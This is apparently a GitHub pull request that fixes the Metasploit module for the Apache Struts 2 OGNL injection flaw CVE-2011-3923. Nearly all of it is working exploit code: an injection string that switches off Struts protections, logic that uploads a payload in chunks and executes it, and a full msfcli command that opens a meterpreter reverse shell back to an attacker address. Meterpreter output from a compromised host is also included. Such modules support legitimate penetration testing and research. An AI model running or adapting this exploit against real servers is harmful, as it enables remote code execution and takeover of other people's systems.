### PR TITLE
fixed CVE-2011-3923 - struts_code_exec_parameters 

### DIFF
--- a/modules/exploits/multi/http/struts_code_exec_parameters.rb
+++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb
@@ -78,14 +78,15 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def execute_command(cmd)
+    junk = Rex::Text.rand_text_alpha(6)
     inject = "(#context[\"xwork.MethodAccessor.denyMethodExecution\"]= new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]"
-    inject << "= new java.lang.Boolean(true),#{cmd})('meh')"
+    inject << "= new java.lang.Boolean(true),#{cmd})('#{junk}')"
     uri = normalize_uri(datastore['TARGETURI'])
     resp = send_request_cgi({
       'uri'     => uri,
       'version' => '1.1',
       'method'  => 'GET',
-      'vars_get' => { parameter => inject, "z[(#{parameter})(meh)]" => 'true' }
+      'vars_get' => { parameter => inject, "z[(#{parameter})(#{junk})]" => 'true' }
     })
     resp
   end

--- a/modules/exploits/multi/http/struts_code_exec_parameters.rb
+++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb
@@ -27,7 +27,8 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           'Meder Kydyraliev', # Vulnerability Discovery and PoC
           'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module
-          'mihi' #ARCH_JAVA support
+          'mihi', #ARCH_JAVA support
+          'Christian Mehlmauer' # Metasploit Module
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -66,8 +67,8 @@ class Metasploit3 < Msf::Exploit::Remote
       register_options(
         [
           Opt::RPORT(8080),
-          OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]),
-          OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/blank-struts2/login.action"]),
+          OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.','username']),
+          OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']),
           OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
     ], self.class)
   end
@@ -86,56 +87,56 @@ class Metasploit3 < Msf::Exploit::Remote
       'method'  => 'GET',
       'vars_get' => { parameter => inject, "z[(#{parameter})(meh)]" => 'true' }
     })
-    return resp
+    resp
   end
 
   def exploit
     #Set up generic values.
-    @payload_exe = rand_text_alphanumeric(4+rand(4))
+    payload_exe = rand_text_alphanumeric(4 + rand(4))
     pl_exe = generate_payload_exe
-    append = 'false'
+    append = false
     #Now arch specific...
     case target['Platform']
     when 'linux'
-      @payload_exe = "/tmp/#{@payload_exe}"
-      chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\"))"
-      exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{@payload_exe}\".split(\"_\"))"
+      payload_exe = "/tmp/#{payload_exe}"
+      chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{payload_exe}\".split(\"_\"))"
+      exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{payload_exe}\".split(\"_\"))"
     when 'java'
-      @payload_exe << ".jar"
+      payload_exe << ".jar"
       pl_exe = payload.encoded_jar.pack
-      exec_cmd = ""
+      exec_cmd = ''
       exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
       exec_cmd << "#q.setAccessible(true),#q.set(null,true),"
       exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
       exec_cmd << "#q.setAccessible(true),#q.set(null,false),"
-      exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),"
+      exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{payload_exe}').toURI().toURL()}),"
       exec_cmd << "#c=#cl.loadClass('metasploit.Payload'),"
       exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
       exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
     when 'windows'
-      @payload_exe = "./#{@payload_exe}.exe"
-      exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')"
+      payload_exe = "./#{payload_exe}.exe"
+      exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{payload_exe}')"
     else
       fail_with(Failure::NoTarget, 'Unsupported target platform!')
     end
 
     #Now with all the arch specific stuff set, perform the upload.
     #109 = length of command string plus the max length of append.
-    sub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length
+    sub_from_chunk = 109 + payload_exe.length + datastore['TARGETURI'].length + parameter.length
     chunk_length = 2048 - sub_from_chunk
-    chunk_length = ((chunk_length/4).floor)*3
+    chunk_length = ((chunk_length/4).floor) * 3
     while pl_exe.length > chunk_length
-      java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)
+      java_upload_part(pl_exe[0,chunk_length], payload_exe, append)
       pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]
       append = true
     end
-    java_upload_part(pl_exe,@payload_exe,append)
+    java_upload_part(pl_exe, payload_exe, append)
     execute_command(chmod_cmd) if target['Platform'] == 'linux'
     execute_command(exec_cmd)
-    register_files_for_cleanup(@payload_exe)
+    register_files_for_cleanup(payload_exe)
   end
 
-  def java_upload_part(part, filename, append = 'false')
+  def java_upload_part(part, filename, append = false)
     cmd = ""
     cmd << "#f=new java.io.FileOutputStream('#{filename}',#{append}),"
     cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
@@ -151,7 +152,6 @@ class Metasploit3 < Msf::Exploit::Remote
     response = execute_command(check_cmd)
     t2 = Time.now
     delta = t2 - t1
-
 
     if response.nil?
       return Exploit::CheckCode::Safe

--- a/modules/exploits/multi/http/struts_code_exec_parameters.rb
+++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb
@@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
           OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.','username']),
           OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']),
           OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]),
-          OptString.new('GET_PARAMETERS', [ false, 'Additional GET Parameters to send. Please supply in the format "param1=a&param2=b". Do not URL encode the Parameters, they are encoded before sending by the module.', nil]),
+          OptString.new('GET_PARAMETERS', [ false, 'Additional GET Parameters to send. Please supply in the format "param1=a&param2=b". Do apply URL encoding to the Parameters.', nil]),
     ], self.class)
   end
 
@@ -86,7 +86,9 @@ class Metasploit3 < Msf::Exploit::Remote
     splitted.each { |item|
       name, value = item.split('=')
       # no check here, value can be nil if parameter is &param
-      retval[name] = value
+      decoded_name = name ? Rex::Text::uri_decode(name) : nil
+      decoded_value = value ? Rex::Text::uri_decode(value) : nil
+      retval[decoded_name] = decoded_value
     }
     retval
   end

--- a/modules/exploits/multi/http/struts_code_exec_parameters.rb
+++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb
@@ -69,12 +69,26 @@ class Metasploit3 < Msf::Exploit::Remote
           Opt::RPORT(8080),
           OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.','username']),
           OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']),
-          OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
+          OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]),
+          OptString.new('GET_PARAMETERS', [ false, 'Additional GET Parameters to send. Please supply in the format "param1=a&param2=b". Do not URL encode the Parameters, they are encoded before sending by the module.', nil]),
     ], self.class)
   end
 
   def parameter
     datastore['PARAMETER']
+  end
+
+  def get_parameter
+    retval = {}
+    return retval unless datastore['GET_PARAMETERS']
+    splitted = datastore['GET_PARAMETERS'].split('&')
+    return retval if splitted.nil? || splitted.empty?
+    splitted.each { |item|
+      name, value = item.split('=')
+      # no check here, value can be nil if parameter is &param
+      retval[name] = value
+    }
+    retval
   end
 
   def execute_command(cmd)
@@ -86,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'uri'     => uri,
       'version' => '1.1',
       'method'  => 'GET',
-      'vars_get' => { parameter => inject, "z[(#{parameter})(#{junk})]" => 'true' }
+      'vars_get' => { parameter => inject, "z[(#{parameter})(#{junk})]" => 'true' }.merge(get_parameter)
     })
     resp
   end

--- a/modules/exploits/multi/http/struts_code_exec_parameters.rb
+++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb
@@ -67,25 +67,26 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           Opt::RPORT(8080),
           OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]),
-          OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/blank-struts2/login.action?INJECT"]),
+          OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/blank-struts2/login.action"]),
           OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
     ], self.class)
   end
 
-  def execute_command(cmd, opts = {})
-    inject = "PARAMETERTOKEN=(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=+new+java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]"
-    inject << "=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true"
-    inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER']))
-    inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd))
-    uri = String.new(datastore['TARGETURI'])
-    uri = normalize_uri(uri)
-    uri.gsub!(/INJECT/,inject) # append the injection string
+  def parameter
+    datastore['PARAMETER']
+  end
+
+  def execute_command(cmd)
+    inject = "(#context[\"xwork.MethodAccessor.denyMethodExecution\"]= new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]"
+    inject << "= new java.lang.Boolean(true),#{cmd})('meh')"
+    uri = normalize_uri(datastore['TARGETURI'])
     resp = send_request_cgi({
       'uri'     => uri,
       'version' => '1.1',
       'method'  => 'GET',
+      'vars_get' => { parameter => inject, "z[(#{parameter})(meh)]" => 'true' }
     })
-    return resp #Used for check function.
+    return resp
   end
 
   def exploit


### PR DESCRIPTION
I encountered this when participating in a hacking challenge with a vulnerable server setup. The exploit was not working correctly so I modified it and it worked. This needs to be tested, since this removes the abbility to supply additional GET parameters. I think the Problem here is, not all characters are correctly URI escaped.

Also the JAVA Target was not working on this one. Maybe the java target part needs some work too.
##### System Information

struts 2.3.1.1 / tomcat 5 / linux 64 bit
##### Vulnerable Web App downloaded

[REMOVED] - Contact me if you want it.
the `login` webapp is vulnerable to CVE-2011-3923
Valid Username: `Peter`, Password: `Password`
##### Additional System Info:

```
sh-3.2$ java --version
java version "1.4.2"
gij (GNU libgcj) version 4.1.2 20080704 (Red Hat 4.1.2-51)

Copyright (C) 2006 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
```

```
meterpreter > sysinfo
Computer     : ebanking.XXXXXX
OS           : Linux ebanking.XXXXXX 2.6.18-274.18.1.el5 #1 SMP Thu Feb 9 12:45:44 EST 2012 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
```

```
sh-3.2$ cat /etc/issue
CentOS release 5.7 (Final)
Kernel \r on an \m
```

Command Line used to exploit it:

```
msfcli exploit/multi/http/struts_code_exec_parameters PARAMETER=username RHOST=ebanking.XXXXXX RPORT=443 SSL=TRUE TARGETURI=/login/Login.action TARGET=1 PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST=10.201.1.202 E
```
